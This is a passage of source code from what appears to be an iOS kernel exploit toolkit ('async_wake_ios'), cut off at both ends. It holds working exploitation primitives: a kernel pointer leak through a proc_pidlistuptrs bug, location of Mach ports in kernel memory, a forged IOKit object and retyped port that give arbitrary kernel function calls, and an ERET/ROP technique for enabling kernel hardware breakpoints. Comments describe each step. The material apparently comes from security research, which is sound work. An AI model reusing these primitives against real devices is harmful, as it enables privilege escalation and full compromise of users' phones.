mach_error_string(err)); 161 | exit(EXIT_FAILURE); 162 | } 163 | 164 | return q; 165 | } 166 | 167 | static int uint64_t_compare(const void* a, const void* b) { 168 | uint64_t a_val = (*(uint64_t*)a); 169 | uint64_t b_val = (*(uint64_t*)b); 170 | if (a_val < b_val) { 171 | return -1; 172 | } 173 | if (a_val == b_val) { 174 | return 0; 175 | } 176 | return 1; 177 | } 178 | 179 | uint64_t find_port_via_proc_pidlistuptrs_bug(mach_port_t port, int disposition) { 180 | prepare_kqueue(); 181 | 182 | int n_guesses = 100; 183 | uint64_t* guesses = calloc(1, n_guesses*sizeof(uint64_t)); 184 | int valid_guesses = 0; 185 | 186 | for (int i = 1; i < n_guesses+1; i++) { 187 | mach_port_t q = fill_kalloc_with_port_pointer(port, i, disposition); 188 | mach_port_destroy(mach_task_self(), q); 189 | uint64_t leaked = try_leak(i-1); 190 | //printf("leaked %016llx\n", leaked); 191 | 192 | // a valid guess is one which looks a bit like a kernel heap pointer 193 | // without the upper byte: 194 | if ((leaked < 0x00ffffff00000000) && (leaked > 0x00ffff0000000000)) { 195 | guesses[valid_guesses++] = leaked | 
0xff00000000000000; 196 | } 197 | } 198 | 199 | if (valid_guesses == 0) { 200 | printf(" [-] couldn't leak any kernel pointers\n"); 201 | exit(EXIT_FAILURE); 202 | } 203 | 204 | // return the most frequent guess 205 | qsort(guesses, valid_guesses, sizeof(uint64_t), uint64_t_compare); 206 | 207 | uint64_t best_guess = guesses[0]; 208 | int best_guess_count = 1; 209 | 210 | uint64_t current_guess = guesses[0]; 211 | int current_guess_count = 1; 212 | for (int i = 1; i < valid_guesses; i++) { 213 | if (guesses[i] == guesses[i-1]) { 214 | current_guess_count++; 215 | if (current_guess_count > best_guess_count) { 216 | best_guess = current_guess; 217 | best_guess_count = current_guess_count; 218 | } 219 | } else { 220 | current_guess = guesses[i]; 221 | current_guess_count = 1; 222 | } 223 | } 224 | 225 | //printf("best guess is: 0x%016llx with %d%% of the valid guesses for it\n", best_guess, (best_guess_count*100)/valid_guesses); 226 | 227 | free(guesses); 228 | 229 | return best_guess; 230 | } 231 | 232 | uint64_t find_port_via_kmem_read(mach_port_name_t port) { 233 | uint64_t task_port_addr = task_self_addr(); 234 | 235 | uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 236 | 237 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 238 | 239 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 240 | 241 | uint32_t port_index = port >> 8; 242 | const int sizeof_ipc_entry_t = 0x18; 243 | 244 | uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t)); 245 | return port_addr; 246 | } 247 | 248 | uint64_t find_port_address(mach_port_t port, int disposition) { 249 | if (have_kmem_read()) { 250 | return find_port_via_kmem_read(port); 251 | } 252 | return find_port_via_proc_pidlistuptrs_bug(port, disposition); 253 | } 254 | -------------------------------------------------------------------------------- /async_wake_ios/find_port.h: -------------------------------------------------------------------------------- 1 | #ifndef find_port_h 2 | #define find_port_h 3 | 4 | #include 5 | 6 | uint64_t find_port_address(mach_port_t port, int disposition); 7 | 8 | #endif /* find_port_h */ 9 | -------------------------------------------------------------------------------- /async_wake_ios/kcall.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "kcall.h" 8 | #include "kmem.h" 9 | #include "find_port.h" 10 | #include "kutils.h" 11 | #include "symbols.h" 12 | #include "early_kalloc.h" 13 | 14 | 15 | 16 | extern uint64_t 17 | iokit_user_client_trap( 18 | mach_port_t connect, 19 | unsigned int index, 20 | uintptr_t p1, 21 | uintptr_t p2, 22 | uintptr_t p3, 23 | uintptr_t p4, 24 | uintptr_t p5, 25 | uintptr_t p6 ); 26 | 27 | #if 0 28 | // OSSerializer::Serialize method 29 | // lets you pass two uint64_t arguments 30 | // no return value 31 | 32 | // a simple IOKit mig method 33 | extern void IOIteratorReset(mach_port_t port); 34 | 35 | struct fake_iokit_obj { 36 | uint64_t vtable; 37 | uint64_t refcount; // vtable +0x00 38 | uint64_t arg0; // vtable +0x08 39 | uint64_t arg1; // vtable +0x10 40 | uint64_t fptr; // vtable +0x18 41 | uint64_t retain; // vtable +0x20 42 | uint64_t release; // vtable +0x28 43 | uint64_t ign; // vtable +0x30 44 | uint64_t get_meta_class; // vtable +0x38 45 | }; 46 | 47 | // call fptr in the context of the current thread passing arg0 and arg1 48 | // uses the 
serializer gadget 49 | void kcall(uint64_t fptr, uint64_t arg0, uint64_t arg1) { 50 | // allocate some memory to hold a fake iokit object: 51 | uint64_t obj_kaddr = kmem_alloc(sizeof(struct fake_iokit_obj)+0x800); 52 | 53 | // fill in the fields: 54 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, vtable), obj_kaddr+0x08); // point this to the next field 55 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, refcount), 0x2017); 56 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, arg0), arg0); 57 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, arg1), arg1); 58 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, fptr), fptr); 59 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, retain), ksym(KSYMBOL_RET)); 60 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, release), ksym(KSYMBOL_OSSERIALIZER_SERIALIZE)); 61 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, ign), 0); 62 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, get_meta_class), ksym(KSYMBOL_OSARRAY_GET_META_CLASS)); 63 | for (int i = 1; i < 0xff; i++) { 64 | wk64(obj_kaddr+offsetof(struct fake_iokit_obj, get_meta_class) + (i*8), 0x1010101010101000+(i*4)); 65 | } 66 | 67 | // allocate a port 68 | mach_port_t port = MACH_PORT_NULL; 69 | kern_return_t err; 70 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 71 | if (err != KERN_SUCCESS) { 72 | printf("failed to allocate port\n"); 73 | return; 74 | } 75 | 76 | // get a send right 77 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 78 | 79 | // locate the port 80 | uint64_t port_addr = find_port_address(port, MACH_MSG_TYPE_COPY_SEND); 81 | 82 | // change the type of the port 83 | #define IKOT_IOKIT_OBJECT 30 84 | #define IO_ACTIVE 0x80000000 85 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_IOKIT_OBJECT); 86 | 87 | // cache the current space: 88 | uint64_t original_space = rk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 89 | 90 | // change the space of the port 91 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); 92 | 93 | // set the kobject 94 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), obj_kaddr); 95 | 96 | // call an iokit method 97 | IOIteratorReset(port); 98 | 99 | // clear the kobject 100 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), 0); 101 | 102 | // reset the space 103 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), original_space); 104 | 105 | // reset the type 106 | #define IKOT_NONE 0 107 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_NONE); 108 | 109 | // release the port 110 | mach_port_destroy(mach_task_self(), port); 111 | 112 | // free the fake object 113 | kmem_free(obj_kaddr, sizeof(struct fake_iokit_obj)+0x800); 114 | } 115 | 116 | void test_kcall() { 117 | uint64_t test_buf = kmem_alloc(0x20); 118 | wk64(test_buf, 0x4141414141414141); 119 | wk64(test_buf+8, 0); 120 | kcall(ksym(KSYMBOL_UUID_COPY), test_buf+8, test_buf); 121 | uint64_t read_val = rk64(test_buf+8); 122 | printf("read_val: %llx\n", read_val); 123 | kmem_free(test_buf, 0x20); 124 | } 125 | #endif 126 | 127 | /* 128 | __TEXT_EXEC:__text:FFFFFFF0073EB130 _csblob_get_cdhash ; DATA XREF: com.apple.driver.AppleMobileFileIntegrity:__got:AppleMobileFileIntegrity_GOT__csblob_get_cdhasho 129 | __TEXT_EXEC:__text:FFFFFFF0073EB130 ; com.apple.security.sandbox:__got:sandbox_GOT__csblob_get_cdhasho 130 | __TEXT_EXEC:__text:FFFFFFF0073EB130 ADD X0, X0, #0x40 131 | __TEXT_EXEC:__text:FFFFFFF0073EB134 RET 
132 | */ 133 | 134 | mach_port_t arbitrary_call_port = MACH_PORT_NULL; 135 | uint64_t obj_kaddr = 0; 136 | 137 | // the iokit_user_client_trap method. 138 | // this lets you pass up to 7 uint64_t arguments 139 | // the return value will be truncated to 32-bits 140 | // see arm_set_mach_syscall_ret for why: 141 | // static void 142 | // arm_set_mach_syscall_ret(struct arm_saved_state *state, int retval) 143 | // { 144 | // if (is_saved_state32(state)) { 145 | // saved_state32(state)->r[0] = retval; 146 | // } else { 147 | // saved_state64(state)->x[0] = retval; 148 | // } 149 | // } 150 | // that compiles to: 151 | // STR W20, [X19,#8] <-- 32-bit store 152 | 153 | uint64_t kcall(uint64_t fptr, uint32_t argc, ...) { 154 | uint64_t args[7] = {0}; 155 | va_list ap; 156 | va_start(ap, argc); 157 | 158 | if (argc > 7) { 159 | printf("too many arguments to kcall\n"); 160 | return 0; 161 | } 162 | 163 | for (int i = 0; i < argc; i++){ 164 | args[i] = va_arg(ap, uint64_t); 165 | } 166 | 167 | va_end(ap); 168 | 169 | if (arbitrary_call_port == MACH_PORT_NULL) { 170 | // build the object: 171 | // allocate some memory to hold a fake iokit object: 172 | obj_kaddr = early_kalloc(0x1000); 173 | printf("kcall object allocated via early_kalloc at %llx\n", obj_kaddr); 174 | 175 | // fill in the fields: 176 | wk64(obj_kaddr + 0, obj_kaddr+0x800); // vtable pointer 177 | 178 | // IOExternalTrap 179 | wk64(obj_kaddr + 0x50, 0); // the function pointer is actually a pointer-to-member-method, so needs a 0 here too 180 | // see this old bug where I discuss pointer-to-member-methods: 181 | // https://bugs.chromium.org/p/project-zero/issues/detail?id=20 182 | 183 | wk32(obj_kaddr + 0x9c, 0x1234); // __ipc 184 | 185 | // vtable: 186 | wk64(obj_kaddr + 0x800 + 0x20, ksym(KSYMBOL_RET)); // vtable::retain 187 | wk64(obj_kaddr + 0x800 + 0x28, ksym(KSYMBOL_RET)); // vtable::release 188 | wk64(obj_kaddr + 0x800 + 0x38, ksym(KSYMBOL_IOUSERCLIENT_GET_META_CLASS)); // vtable::getMetaClass 189 | wk64(obj_kaddr + 0x800 + 0x5b8, ksym(KSYMBOL_CSBLOB_GET_CD_HASH)); // vtable::getExternalTrapForIndex 190 | wk64(obj_kaddr + 0x800 + 0x5c0, ksym(KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX)); 191 | 192 | // allocate a port 193 | kern_return_t err; 194 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &arbitrary_call_port); 195 | if (err != KERN_SUCCESS) { 196 | printf("failed to allocate port\n"); 197 | return 0; 198 | } 199 | 200 | // get a send right 201 | mach_port_insert_right(mach_task_self(), arbitrary_call_port, arbitrary_call_port, MACH_MSG_TYPE_MAKE_SEND); 202 | 203 | // locate the port 204 | uint64_t port_addr = find_port_address(arbitrary_call_port, MACH_MSG_TYPE_COPY_SEND); 205 | 206 | // change the type of the port 207 | #define IKOT_IOKIT_CONNECT 29 208 | #define IO_ACTIVE 0x80000000 209 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_IOKIT_CONNECT); 210 | 211 | // cache the current space: 212 | //uint64_t original_space = rk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)); 213 | 214 | // change the space of the port 215 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); 216 | 217 | // set the kobject 218 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), obj_kaddr); 219 | } 220 | 221 | // put arg0 and the function pointer in the right place 222 | wk64(obj_kaddr + 0x40, args[0]); 223 | wk64(obj_kaddr + 0x48, fptr); 224 | 225 | // call the external trap: 226 | uint64_t return_val = 
iokit_user_client_trap(arbitrary_call_port, 0, 227 | args[1], 228 | args[2], 229 | args[3], 230 | args[4], 231 | args[5], 232 | args[6]); 233 | 234 | printf("return val %llx\n", return_val); 235 | 236 | #if 0 237 | // clear the kobject 238 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), 0); 239 | 240 | // reset the space 241 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), original_space); 242 | 243 | // reset the type 244 | #define IKOT_NONE 0 245 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_NONE); 246 | 247 | // release the port 248 | mach_port_destroy(mach_task_self(), port); 249 | #endif 250 | 251 | return return_val; 252 | } 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | -------------------------------------------------------------------------------- /async_wake_ios/kcall.h: -------------------------------------------------------------------------------- 1 | #ifndef kcall_h 2 | #define kcall_h 3 | 4 | void kprintstr(char* msg); 5 | void test_kcall(void); 6 | //void kcall(uint64_t fptr, uint64_t arg0, uint64_t arg1); 7 | uint64_t kcall(uint64_t fptr, uint32_t argc, ...); 8 | #endif 9 | -------------------------------------------------------------------------------- /async_wake_ios/kdbg.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "kdbg.h" 7 | #include "kutils.h" 8 | #include "kmem.h" 9 | #include "symbols.h" 10 | #include "kcall.h" 11 | #include "find_port.h" 12 | #include "early_kalloc.h" 13 | #include "arm64_state.h" 14 | 15 | /* 16 | A thread-local iOS kernel debugger for all ARM64 devices 17 | 18 | This code uses a kernel memory read-write primitve to enable a hardware breakpoint in EL1 on a particular thread. 19 | 20 | When that bp triggers it will eventually end up stuck in a loop: 21 | 22 | case ESR_EC_BKPT_REG_MATCH_EL1: 23 | if (FSC_DEBUG_FAULT == ISS_SSDE_FSC(esr)) { 24 | kprintf("Hardware Breakpoint Debug exception from kernel. Hanging here (by design).\n"); 25 | for (;;); 26 | 27 | That thread will eventually get preempted; when that happens we'll find its state (from userspace) and modify it 28 | such that it breaks out of that loop and continues with the desired state. 29 | 30 | Doing this requires careful attention to how aarch64 exceptions work, how XNU handles nested exceptions 31 | and how context switching works. A description of this is given below: 32 | 33 | AArch64 Exceptions: 34 | There are four classes of AArch64 exceptions: Synchronous, IRQ, FIQ, SError. These exceptions are the only 35 | way which the CPU will transition between Exception Levels (EL.) There are four Exception Levels: EL0, EL1, 36 | EL2, EL3. In iOS userspace runs in EL0 and the kernel runs in EL1. These are similar to the Ring 0 & Ring 3 37 | in x86. All 64-bit iOS devices below iPhone 7 also contain a secure monitor which runs in EL3. 38 | 39 | Exception types: 40 | 41 | Synchronous: These are things like SVC instructions (used for syscalls), breakpoints, data aborts etc 42 | IRQ: These are external interrupts from devices 43 | FIQ: These are also external interrupts 44 | SError: These are system errors, things like ECC errors 45 | 46 | For our purposes we're interested in Synchronous and FIQ interrupts. Hardware breakpoints are synchronous exceptions. 47 | The timer which drives the scheduler is attached as an FIQ source. 
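 (The FIQ case matters here because it's the scheduler's timer FIQ which eventually preempts the
 thread spinning in that "Hanging here (by design)" loop, spilling an arm_context_t onto its kernel
 stack where we can find it and modify it from userspace.)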
48 | 
49 | Aarch64 further subdivides those four exception classes into another four categories depending on where the
50 | exception came from:
51 | a) Exception came from the current exception level which was running on SP_EL0
52 | b) Exception came from the current exception level which was running on SP_EL1
53 | c) Exception came from a lower exception level which was executing in AArch64 mode
54 | d) Exception came from a lower exception level which was executing in AArch32 mode
55 | 
56 | Each of these 16 cases has its own vector (handling routine.)
57 | 
58 | sp registers:
59 | sp isn't a general purpose register; it's better to view it as an alias for one of four separate hardware registers:
60 | SP_EL0, SP_EL1, SP_EL2, SP_EL3.
61 | 
62 | When an exception is taken sp will be set to name the SP_ELX register for the exception level which the exception is taken to.
63 | For example, when userspace (EL0) makes a syscall (Synchronous exception to EL1 from lower exception level) sp will name SP_EL1 in the handler.
64 | 
65 | To enable nested exceptions code generally switches back to using SP_EL0 regardless of which exception level it's actually
66 | running at (obviously after first saving the original value of SP_EL0 so it can be restored.)
67 | 
68 | Nested exceptions and masking:
69 | 
70 | The four PSTATE.{A,D,F,I} bits control exception masking. Whenever any exception is taken these four bits will be set.
71 | 
72 | PSTATE.A: SError interrupts will be pended until this bit is cleared
73 | PSTATE.F: FIQ interrupts will be pended until this bit is cleared
74 | PSTATE.I: IRQ interrupts will be pended until this bit is cleared
75 | PSTATE.D: Debug interrupts will be suppressed until this bit is cleared
76 | 
77 | These bits can be manually set/cleared by writing to the DAIFSet/DAIFClr msrs. The bits will also be restored to their saved value
78 | during an ERET (return from exception) from the SPSR_ELX register (where X is the EL the exception was taken to.)
79 | 
80 | Synchronous exceptions which are not Debug exceptions cannot be masked. However Debug exceptions will be suppressed, and XNU doesn't re-enable
81 | them. This presents the first major hurdle to implementing this debugger as the exceptions generated by hardware breakpoints fall into
82 | the Debug category and will therefore never generate exceptions even if we set them and enable them for EL1.
83 | 
84 | Note that the Debug exceptions will be suppressed, that is, they will never fire, unlike the other maskable interrupts which will just be pended
85 | and will fire as soon as they are un-masked.
86 | 
87 | Re-enabling Debug exceptions during syscall execution:
88 | The trick to clearing PSTATE.D is to fake a return from an exception by calling ERET using an arbitrary-call primitive.
89 | 
90 | See below in the code for exactly the right gadget which will let us restore a complete register state (including CPSR.)
91 | 
92 | With PSTATE.D cleared we point pc back to near the start of the syscall handling path so we can fake the execution of an arbitrary
93 | syscall.
94 | 
95 | There are a couple of other things preventing HW breakpoints firing:
96 | 
97 | The Kernel Debug Enable bit has to be set in MDSCR_EL1. This can be set with some simple ROP. It's per-core, and it won't be cleared if we get
98 | scheduled off so it's sufficient to just set it once.
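 (set_MDSCR_EL1_KDE() below does exactly this: it uses the arbitrary-call primitive to fake an
 exception return with pc pointing at an "MSR MDSCR_EL1, X8" gadget, x8 holding the KDE bit and
 sp pointing at a small ROP stack which then returns to userspace via thread_exception_return.)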
99 | 
100 | We can use the thread_set_state API to set a breakpoint on a kernel address, but it sanitizes the BCRX control flags so it's also
101 | necessary to set ARM_DBG_CR_MODE_CONTROL_ANY using the kernel memory r/w.
102 | 
103 | Finding and modifying the stuck thread state:
104 | This is explained below. We pin a monitor thread to the same core as the debugee then search the debugee's kernel stack looking for the
105 | set of stack frames which indicate it's got stuck in the kernel hw bp hit infinite loop.
106 | 
107 | We then expose the state at the bp to a callback which can modify it before unblocking the stuck kernel thread.
108 | 
109 | Limitations:
110 | I only wrote code to support one breakpoint at the moment, expect a fuller-featured, interactive version soon!
111 | 
112 | Don't set breakpoints when things like spinlocks are held, it will go very badly.
113 | 
114 | Single-step won't work. In the breakpoint handler you have to emulate the instruction and manually move pc on.
115 | 
116 | It's slow! This is unlikely to change given how it works, but hey, you're modifying kernel thread state from userspace on the same machine!
117 | 
118 | */
119 | 
120 | // scheduling mach trap to yield the cpu
121 | extern boolean_t swtch_pri(int pri);
122 | 
123 | // pin the current thread to a processor, returns a pointer to the processor we're pinned to
124 | uint64_t pin_current_thread() {
125 |   // get the current thread_t:
126 |   uint64_t th = current_thread();
127 | 
128 | #if 0
129 |   // get the processor_t this thread last ran on
130 |   uint64_t processor = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR));
131 |   printf("thread %llx last ran on %llx, pinning it to that core\n", th, processor);
132 | 
133 |   // this is probably fine...
134 |   wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor);
135 | #endif
136 | 
137 |   // need the struct cpu_data for that processor which is stored in the CpuDataEntries array, declared in data.s
138 |   // it's 6*4k into the data segment
139 |   uint64_t cpu_data_entries = ksym(KSYMBOL_CPU_DATA_ENTRIES);
140 | 
141 |   int cpu_id = 0;
142 | 
143 |   // it's an array of cpu_data_entry_t which contains just the 64-bit physical and virtual addresses of struct cpu_data
144 |   uint64_t cpu_data = rk64(cpu_data_entries + ((cpu_id * 0x10) + 8));
145 | 
146 |   uint64_t processor = rk64(cpu_data + koffset(KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR));
147 |   printf("trying to pin to cpu0: %llx\n", processor);
148 |   // pin to that cpu
149 |   // this is probably fine...
150 | wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); 151 | 152 | // that binding will only take account once we get scheduled off and back on again so yield the cpu: 153 | printf("pin_current_thread yielding cpu\n"); 154 | swtch_pri(0); 155 | printf("pin_current_thread back on cpu\n"); 156 | uint64_t chosen = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); 157 | printf("running on %llx\n", chosen); 158 | 159 | #if 0 160 | // should now be running on the chosen processor, and should only get scheduled on there: 161 | printf("we're running again!\n"); 162 | 163 | 164 | int got_switched = 0; 165 | for (int i = 0; i < 1000; i++) { 166 | swtch_pri(0); 167 | uint64_t p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); 168 | if (p != processor) { 169 | printf("got moved off target processor\n"); 170 | got_switched = 1; 171 | break; 172 | } 173 | usleep(15000); 174 | p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); 175 | if (p != processor) { 176 | printf("got moved off target processor\n"); 177 | got_switched = 1; 178 | break; 179 | } 180 | } 181 | if (!got_switched) { 182 | printf("looks like pinning works!\n"); 183 | } 184 | #endif 185 | return processor; 186 | } 187 | 188 | #if 0 189 | 190 | use the two argument arbitrary call to call this: 191 | __TEXT_EXEC:__text:FFFFFFF0070CC1AC MOV X21, X0 192 | __TEXT_EXEC:__text:FFFFFFF0070CC1B0 MOV X22, X1 193 | __TEXT_EXEC:__text:FFFFFFF0070CC1B4 BR X22 194 | 195 | that gives control of x21 and pc 196 | 197 | point pc to this: 198 | 199 | exception_return: 200 | msr DAIFSet, #(DAIFSC_IRQF | DAIFSC_FIQF) // Disable interrupts 201 | mrs x3, TPIDR_EL1 // Load thread pointer 202 | mov sp, x21 // Reload the pcb pointer 203 | 204 | /* ARM64_TODO Reserve x18 until we decide what to do with it */ 205 | ldr x0, [x3, TH_CTH_DATA] // Load cthread data pointer 206 | str x0, [sp, SS64_X18] // and use it to trash x18 207 | 208 | Lexception_return_restore_registers: 209 | /* Restore special register state */ 210 | ldr x0, [sp, SS64_PC] // Get the return address 211 | ldr w1, [sp, SS64_CPSR] // Get the return CPSR 212 | ldr w2, [sp, NS64_FPSR] 213 | ldr w3, [sp, NS64_FPCR] 214 | 215 | msr ELR_EL1, x0 // Load the return address into ELR 216 | msr SPSR_EL1, x1 // Load the return CPSR into SPSR 217 | msr FPSR, x2 218 | msr FPCR, x3 // Synchronized by ERET 219 | 220 | mov x0, sp // x0 = &pcb 221 | 222 | /* Restore arm_neon_saved_state64 */ 223 | ldp q0, q1, [x0, NS64_Q0] 224 | ldp q2, q3, [x0, NS64_Q2] 225 | ldp q4, q5, [x0, NS64_Q4] 226 | ldp q6, q7, [x0, NS64_Q6] 227 | ldp q8, q9, [x0, NS64_Q8] 228 | ldp q10, q11, [x0, NS64_Q10] 229 | ldp q12, q13, [x0, NS64_Q12] 230 | ldp q14, q15, [x0, NS64_Q14] 231 | ldp q16, q17, [x0, NS64_Q16] 232 | ldp q18, q19, [x0, NS64_Q18] 233 | ldp q20, q21, [x0, NS64_Q20] 234 | ldp q22, q23, [x0, NS64_Q22] 235 | ldp q24, q25, [x0, NS64_Q24] 236 | ldp q26, q27, [x0, NS64_Q26] 237 | ldp q28, q29, [x0, NS64_Q28] 238 | ldp q30, q31, [x0, NS64_Q30] 239 | 240 | /* Restore arm_saved_state64 */ 241 | 242 | // Skip x0, x1 - we're using them 243 | ldp x2, x3, [x0, SS64_X2] 244 | ldp x4, x5, [x0, SS64_X4] 245 | ldp x6, x7, [x0, SS64_X6] 246 | ldp x8, x9, [x0, SS64_X8] 247 | ldp x10, x11, [x0, SS64_X10] 248 | ldp x12, x13, [x0, SS64_X12] 249 | ldp x14, x15, [x0, SS64_X14] 250 | ldp x16, x17, [x0, SS64_X16] 251 | ldp x18, x19, [x0, SS64_X18] 252 | ldp x20, x21, [x0, SS64_X20] 253 | ldp x22, x23, [x0, SS64_X22] 254 | ldp x24, x25, [x0, SS64_X24] 255 | ldp x26, x27, [x0, SS64_X26] 256 | ldr x28, 
[x0, SS64_X28] 257 | ldp fp, lr, [x0, SS64_FP] 258 | 259 | // Restore stack pointer and our last two GPRs 260 | ldr x1, [x0, SS64_SP] 261 | mov sp, x1 262 | ldp x0, x1, [x0, SS64_X0] // Restore the GPRs 263 | 264 | eret 265 | 266 | this lets us eret with a completely controlled state :) 267 | 268 | use that to clear PSTATE.D, and return to EL1+SP0 269 | 270 | return to: 271 | 272 | .text 273 | .align 2 274 | fleh_synchronous: 275 | mrs x1, ESR_EL1 // Load exception syndrome 276 | mrs x2, FAR_EL1 // Load fault address 277 | and w3, w1, #(ESR_EC_MASK) 278 | lsr w3, w3, #(ESR_EC_SHIFT) 279 | mov w4, #(ESR_EC_IABORT_EL1) 280 | cmp w3, w4 281 | b.eq Lfleh_sync_load_lr 282 | Lvalid_link_register: <-- ***there*** 283 | 284 | PUSH_FRAME 285 | bl EXT(sleh_synchronous) 286 | POP_FRAME 287 | 288 | b exception_return_dispatch 289 | 290 | in ip7 11.1.2 that's: 291 | __TEXT_EXEC:__text:FFFFFFF0070CC1D4 STP X29, X30, [SP,#var_10]! 292 | __TEXT_EXEC:__text:FFFFFFF0070CC1D8 MOV X29, SP 293 | __TEXT_EXEC:__text:FFFFFFF0070CC1DC BL loc_FFFFFFF0071DDED4 294 | __TEXT_EXEC:__text:FFFFFFF0070CC1E0 MOV SP, X29 295 | __TEXT_EXEC:__text:FFFFFFF0070CC1E4 LDP X29, X30, [SP+0x10+var_10],#0x10 296 | __TEXT_EXEC:__text:FFFFFFF0070CC1E8 B sub_FFFFFFF0070CC3CC 297 | 298 | in the state which we get loaded: 299 | x21 should point to the actual saved ACT_CONTEXT since x21 will be used in the return path if no ASTs are taken 300 | x0 should point to the saved state which we want the debugged syscall to see (not ACT_CONTEXT!) 301 | x1 should be the svn syndrome number (ESR_EC(esr) == ESR_EC_SVC_64) 302 | x2 should be the pc of the svc instruction 303 | sp should be the right place on the thread's kernel stack 304 | 305 | #endif 306 | 307 | 308 | struct syscall_args { 309 | uint32_t number; 310 | uint64_t arg[8]; 311 | }; 312 | 313 | void do_syscall_with_pstate_d_unmasked(struct syscall_args* args) { 314 | // get the target thread_t 315 | //uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND); 316 | //uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 317 | 318 | uint64_t thread_t_addr = current_thread(); 319 | 320 | /* this state should set up as if it were calling the target syscall */ 321 | arm_context_t fake_syscall_args = {0}; 322 | 323 | /* this state will be restored by an eret */ 324 | arm_context_t eret_return_state = {0}; 325 | 326 | // there's no need to initialize too much of this since it won't actually be the state which is restored 327 | // it just needs to be enough to get the target syscall called 328 | fake_syscall_args.ss.ss_64.x[16] = args->number; 329 | fake_syscall_args.ss.ss_64.x[0] = args->arg[0]; 330 | fake_syscall_args.ss.ss_64.x[1] = args->arg[1]; 331 | fake_syscall_args.ss.ss_64.x[2] = args->arg[2]; 332 | fake_syscall_args.ss.ss_64.x[3] = args->arg[3]; 333 | fake_syscall_args.ss.ss_64.x[4] = args->arg[4]; 334 | fake_syscall_args.ss.ss_64.x[5] = args->arg[5]; 335 | fake_syscall_args.ss.ss_64.x[6] = args->arg[6]; 336 | fake_syscall_args.ss.ss_64.x[7] = args->arg[7]; 337 | 338 | fake_syscall_args.ss.ash.flavor = ARM_SAVED_STATE64; 339 | 340 | fake_syscall_args.ss.ss_64.cpsr = 0; 341 | 342 | // allocate a copy of that in wired kernel memory: 343 | //uint64_t fake_syscall_args_kern = kmem_alloc_wired(sizeof(arm_context_t)); 344 | uint64_t fake_syscall_args_kern = early_kalloc(sizeof(arm_context_t)); 345 | kmemcpy(fake_syscall_args_kern, (uint64_t)&fake_syscall_args, sizeof(arm_context_t)); 346 | 347 | // this state needs to 
be a bit more complete... 348 | // x0 of the eret restored state will be the arm_context_t which the syscall dispatch code sees 349 | eret_return_state.ss.ss_64.x[0] = fake_syscall_args_kern; 350 | 351 | // x1 will be the exception syndrome 352 | #define ESR_EC_SVC_64 0x15 353 | #define ESR_EC_SHIFT 26 354 | eret_return_state.ss.ss_64.x[1] = ESR_EC_SVC_64 << ESR_EC_SHIFT; 355 | 356 | // x2 will be the address of the exception, not relevant for a syscall 357 | eret_return_state.ss.ss_64.x[2] = 0x454545454540; 358 | 359 | // x21 will be the real saved state to be used to return back to EL0 360 | // this is the state which was spilled during the actual EL0 -> EL1 transition. 361 | // if a continuation is run x21 won't be used, instead the return will go via the thread's ACT_CONTEXT 362 | // so this makes both paths safe 363 | uint64_t act_context = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_CONTEXT_DATA)); 364 | 